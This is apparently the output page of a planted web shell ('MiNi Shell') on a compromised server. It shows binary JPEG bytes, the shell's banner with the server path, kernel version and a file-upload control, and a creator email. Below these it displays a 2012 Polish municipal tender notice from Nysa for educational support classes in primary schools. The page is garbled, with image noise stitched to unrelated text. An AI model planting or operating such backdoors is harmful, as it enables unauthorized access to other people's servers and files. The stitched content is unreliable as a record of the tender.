JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120927/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120927/206923-N-2012.html

<p class="kh_header"><b>Nysa: Usługa edukacyjna polegająca na zorganizowaniu i przeprowadzeniu określonych zajęć indywidualizujących proces nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Nysa w okresie od 01.11.2012 do 30.06.2013r.</b><br>
<b>Numer ogłoszenia: 206923 - 2012; data zamieszczenia: 27.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nysa - Urząd Miejski w Nysie , ul. Kolejowa 15, 48-300 Nysa, woj. opolskie, tel. (077) 4080513, 4080553, faks (077) 4080553.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nysa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa edukacyjna polegająca na zorganizowaniu i przeprowadzeniu określonych zajęć indywidualizujących proces nauczania i wychowania uczniów klas I-III szkół podstawowych w Gminie Nysa w okresie od 01.11.2012 do 30.06.2013r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje zakup usługi edukacyjnej polegającej na zorganizowaniu i przeprowadzeniu określonych rodzajów zajęć indywidualizujących proces nauczania i wychowania uczniów klas I-III szkół podstawowych w okresie od 01.11.2012 r.do 30.06.2013 r. 

Usługa będzie wykonywana w ramach realizacji projektu systemowego Gminy Nysa 
nr KSI POKL.09.01.02-16-093_11 pn. -Program indywidualizacji procesu nauczania 
i wychowania uczniów klas I-III szkół podstawowych w Gminie Nysa-. Projekt jest współfinansowany przez Unię Europejską z Europejskiego Funduszu Społecznego, realizowany w ramach Programu Operacyjnego Kapitał Ludzki Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.

Zajęcia będą odbywały się w klasach I-III w 9 szkołach podstawowych, których organem prowadzącym jest Gmina Nysa, położonych na jej terytorium, tj.:
1.Szkoła Podstawowa nr 1 w Nysie, 48-300 Nysa, ul. Bohaterów Warszawy 7;  
2.Szkoła Podstawowa nr 3 w Nysie, 48-303 Nysa, ul. Krawiecka 6; 3.Szkoła Podstawowa nr 5 w Nysie 48-300 Nysa, ul. Emilii Gierczak 8; 4.Szkoła Podstawowa nr 10 z oddziałami integracyjnymi w Nysie 48-303 Nysa, ul. 11 Listopada 6 a; 5.Zespół Szkół Sportowych w Nysie Sportowa Szkoła Podstawowa 48-300 Nysa, ul. Bramy Grodkowskiej 4; 6.Zespół Szkolno-Przedszkolny w Białej Nyskiej 48-351 Biała Nyska, ul. Nyska 11; 7.Zespół Szkolno-Przedszkolny w Goświnowicach 48-381 Goświnowice, ul. Kolejowa 5; 8.Zespół Szkolno-Przedszkolny w Kopernikach
48-351 Biała Nyska, Koperniki 16 a; 9.	Zespół Szkolno-Przedszkolny w Niwnicy
48-303 Nysa, Niwnica 127.

Łączna liczba godzin zajęć prowadzonych w 9 szkołach podstawowych wynosi 6869.
 
Zamówienie obejmuje prowadzenie następujących rodzajów zajęć: 
1.zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożonych ryzykiem dysleksji; 2.zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych; 3.zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy; 4.zajęcia socjoterapeutyczne i psychoedukacyjne dla dzieci z zaburzeniami komunikacji społecznej; 5.	gimnastyka korekcyjna dla dzieci z wadami postawy; 6.specjalistyczne zajęcia terapeutyczne (rewalidacyjne, korekcyjno-kompensacyjne, dla dzieci nadpobudliwych psychoruchowo); 7.zajęcia rozwijające zainteresowania uczniów szczególnie uzdolnionych (nauki atematyczno-przyrodnicze, muzyczne, plastyczne, humanistyczne, język niemiecki, zajęcia sportowe).

Zasady prowadzenia zajęć:
1.zajęcia będą odbywać się zgodnie powszechnie obowiązującym prawem oraz zasadami MEN; 2.	zajęcia z uczniami/uczennicami z danej szkoły będą prowadzone na terenie danej szkoły lub zespołu szkolno-przedszkolnego, sale dydaktyczne zostaną użyczone Wykonawcy nieodpłatnie; 3.	zajęcia odbywać się będą w dni robocze, z wyłączeniem sobót; 4.zajęcia będą odbywać się według ustalonego harmonogramu, stanowiącego załącznik do umowy zlecenia. Harmonogram opracowany przez Wykonawcę musi być uzgodniony i zaakceptowany przez Dyrektora danej szkoły oraz zaakceptowany przez Zamawiającego; 5. realizacja zajęć objętych zamówieniem nie może kolidować z kalendarzem roku szkolnego w województwie opolskim oraz planem zajęć danej szkoły, być dostosowana do planu zajęć lekcyjnych poszczególnych uczniów/uczennic biorących udział w projekcie oraz innych wydarzeń jak np. wycieczki i przerwy w zajęciach dydaktycznych; 6.zajęcia winny odbywać się bezpośrednio przed, w przerwach lub po zakończeniu zajęć szkolnych danego ucznia; 7.w trakcie zajęć winno być wykorzystywane doposażenie bazy dydaktycznej zakupione w ramach projektu, z których Wykonawca będzie korzystał nieodpłatnie; 8.zajęcia trwają odpowiednio:
- zajęcia specjalistyczne - 60 minut;  -zajęcia dydaktyczno-wyrównawcze - 45 minut; -	zajęcia rozwijające uzdolnienia - 45 minut; -zajęcia prowadzone będą w oparciu o program opracowany przez osobę prowadzącą zajęcia, z uwzględnieniem wyników diagnozy przeprowadzonej w szkole przez zespół działający na podstawie Standardu I kształcenia ogólnego dla klas I-III szkół podstawowych. Program zajęć powinien uwzględniać specyficzne potrzeby edukacyjne uczennic/uczniów oraz powinien być dostosowany do ich indywidualnych możliwości.

Rodzaj umowy zawieranej z podmiotem świadczącym usługę edukacyjną: umowa zlecenia
Do obowiązków Wykonawcy usługi edukacyjnej będzie należało m.in.:
1.realizacja projektu w najlepszej woli, zgodnie z posiadaną wiedzą fachową, starannie, uczciwie i odpowiedzialnie; 2.przestrzeganie obowiązujących przepisów prawa, zasad MEN, wewnętrznych uregulowań danej szkoły, w której będą odbywać się zajęcia oraz wytycznych Programu Operacyjnego Kapitał Ludzki, szczególnie w zakresie zasady równych szans oraz zasady promocji i informacji; 
3.współpraca z przedstawicielem Zamawiającego pełniącym funkcję Koordynatorki Projektu ; 4.współpraca z Dyrektorem danej szkoły oraz wyznaczonym przez niego Koordynatorem Szkolnym w zakresie spraw mających wpływ na rytm pracy szkoły 
w związku z prowadzeniem zajęć; 5.	prowadzenie zajęć według zaakceptowanego harmonogramu realizacji zajęć oraz dokonywanie w razie potrzeby jego aktualizacji
6.prowadzenie zajęć według zaakceptowanego konspektu zajęć oraz dokonywanie w razie potrzeby jego aktualizacji; 7.	przygotowanie i realizacja zajęć dla uczniów/uczennic w oparciu o diagnozę przygotowaną przez zespoły szkolne oraz dostosowanych do potrzeb uczniów, ich rozwoju psychofizycznego oraz percepcji; 
8.opracowanie materiałów dydaktycznych wykorzystywanych podczas zajęć; 
9.prowadzenie obserwacji postępów każdego ucznia i raportowanie o nich na każdą zgłaszaną przez Zamawiającego prośbę oraz sporządzenie indywidualnej diagnozy ucznia/uczennicy uczestniczącej w projekcie;10.przeprowadzenie testu kompetencji na początku realizacji projektu, po zrealizowaniu połowy zaplanowanych zajęć oraz na zakończenie projektu; 11.	dokumentowanie na bieżąco odbycie się zajęć oraz ich przebieg poprzez prowadzenie dzienników zajęć; 
12.dokumentowanie czasu własnej pracy poprzez sporządzanie sprawozdań z wykonywanych zadań i karty czasu pracy ; 13.	składania Zamawiającemu sprawozdania z wykonanej usługi po zakończeniu realizacji zajęć w każdym miesiącu i na każdą zgłaszaną przez Zamawiającego prośbę;14.mierzenia rezultatów projektu we współpracy z przedstawicielem Zamawiającego;15.informowanie na bieżąco o wszystkich zaistniałych problemach w realizacji projektu oraz reagowanie na sytuacje zagrożenia prawidłowej i terminowej realizacji projektu; 16.dbanie o bezpieczeństwo uczniów/uczennic - Wykonawca ponosi pełną odpowiedzialność za bezpieczeństwo uczniów/uczennic w czasie trwania zajęć oraz jakość i terminowość prowadzonych zajęć; 17.dbałości o stan nieodpłatnie udostępnionych sal dydaktycznych oraz materiałów daktycznych, sprzętu i urządzeń wykorzystywanych w trakcie realizacji zajęć; 18.ponoszenie odpowiedzialności materialnej za mienie; 
a ponadto:
19.opracowanie i przedłożenie Zamawiającemu w terminie do 15.10.2012 r. harmonogramu realizacji zajęć; 20.	opracowanie i przedłożenie Zamawiającemu w terminie do 19.10.2012 r. konspektu zajęć - scenariusza lekcji, w którym uwzględnia się wykorzystanie pomocy dydaktycznych; 21.harmonogram realizacji zajęć oraz konspekt zajęć podlegają akceptacji Dyrektora szkoły, w której prowadzone są zajęcia oraz akceptacji Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 57.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Weryfikacja spełnienia tego warunku dokonywana będzie w oparciu o załączone oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Weryfikacja spełnienia tego warunku dokonywana będzie w oparciu o załączone oświadczenie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Weryfikacja spełnienia tego warunku dokonywana będzie w oparciu o załączone oświadczenie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca dysponuje minimum jedną osobą (odpowiednio do części zamówienia) posiadającą następujące kwalifikacje i doświadczenie:

a)		wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym (dotyczy każdego rodzaju zajęć),

b)		co najmniej stopień awansu nauczyciela kontraktowego (dotyczy każdego rodzaju zajęć),

c)		kwalifikacje do nauczania w klasach I - III szkoły podstawowej (dotyczy zajęć dla uczniów z trudnościami w czytaniu i pisaniu, zajęć dla uczniów z trudnościami w zdobywaniu umiejętności matematycznych, zajęć dla uczniów uzdolnionych rozwijających zainteresowania), 

d)		wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym w zakresie logopedii lub uprawnienia do prowadzenia zajęć logopedycznych: studia podyplomowe w zakresie logopedii lub kurs kwalifikacyjny dający uprawnienia do prowadzenia zajęć logopedycznych (dotyczy zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy),

e)		uprawnienia do prowadzenia zajęć z gimnastyki korekcyjnej: studia podyplomowe w zakresie gimnastyki korekcyjnej lub kurs kwalifikacyjny dający uprawnienia do prowadzenia zajęć z gimnastyki korekcyjnej (dotyczy zajęć gimnastyki korekcyjnej dla dzieci z wadami postawy),
f)		wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym i kwalifikacje do nauczania uczniów objętych kształceniem specjalnym (dotyczy zajęć dla uczniów posiadających orzeczenia do nauczania specjalnego),
g)		wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym i kwalifikacje do nauczania j. niemieckiego (dotyczy zajęć rozwijających zainteresowania uczniów szczególnie uzdolnionych w zakresie języka niemieckiego),
h)		wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym i kwalifikacje w zakresie prowadzenia zajęć terapeutycznych, szczególnie socjoterapeutycznych (dotyczy zajęć socjoterapeutycznych i psychoedukacyjnych dla dzieci z zaburzeniami komunikacji społecznej, zajęć terapeutycznych: rewalidacyjnych, korekcyjno-kompensacyjnych, dla dzieci nadpobudliwych psychoruchowo),
i)		minimum trzyletnie doświadczenie w wykonywaniu usług o charakterze jak przedmiot niniejszego zamówienia (dotyczy wszystkich rodzajów zajęć).

Weryfikacja spełnienia tego warunku dokonywana będzie w oparciu o załączone oświadczenie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Weryfikacja spełnienia tego warunku dokonywana będzie w oparciu o załączone oświadczenie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian:
1.	Zmiany mogą zostać wprowadzone wyłącznie za zgodą obu stron umowy
2.	Zamawiający dopuszcza zmiany harmonogramu realizacji zajęć, z uwzględnieniem założeń zawartych w szczegółowym opisie przedmiotu zamówienia (załącznik nr 1 do SIWZ), uzgodnionego z Dyrektorem szkoły, w której prowadzone są zajęcia i przez niego zaakceptowanego oraz zaakceptowanego przez Zamawiającego. Zmiany w zaakceptowanym harmonogramie  zajęć mogą następować tylko i wyłącznie w formie pisemnej, jednak nie wymagają zawarcia aneksu do umowy. Wykonawca ma obowiązek pisemnego poinformowania Zamawiającego o wszelkich zmianach 
w realizacji harmonogramu zajęć. Harmonogram zajęć nie może kolidować 
z obowiązkowymi, nadobowiązkowymi i dodatkowymi zajęciami szkolnymi uczniów uczestniczących w zajęciach
3.	Zamawiający dopuszcza zmiany osobowe w kadrze dydaktycznej po pisemnym zgłoszeniu przez Wykonawcę oraz pisemnej akceptacji ze strony Zamawiającego. Zmiana ta nie wymaga zawarcia aneksu do umowy
4.	Zamawiający dopuszcza zmiany  okresu realizacji umowy
5.	Zamawiający dopuszcza zmiany  w przypadku wystąpienia siły wyższej 
6.	Zamawiający dopuszcza zmiany  w przypadku wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony, możliwa jest zmiana postanowień umowy 
7.	Zamawiający dopuszcza zmiany w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, możliwa jest zmiana postanowień umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.nysa.pl; www.bip.nysa.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> jw..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.10.2012 godzina 10:00, miejsce: Urząd Miejski Nysa ul. Kolejowa 15;  sekretariat 	Zastępcy Burmistrza Nysy  pok. nr 112 (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjnego Kapitał Ludzki, Działanie 9.1. Wyrównywania szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com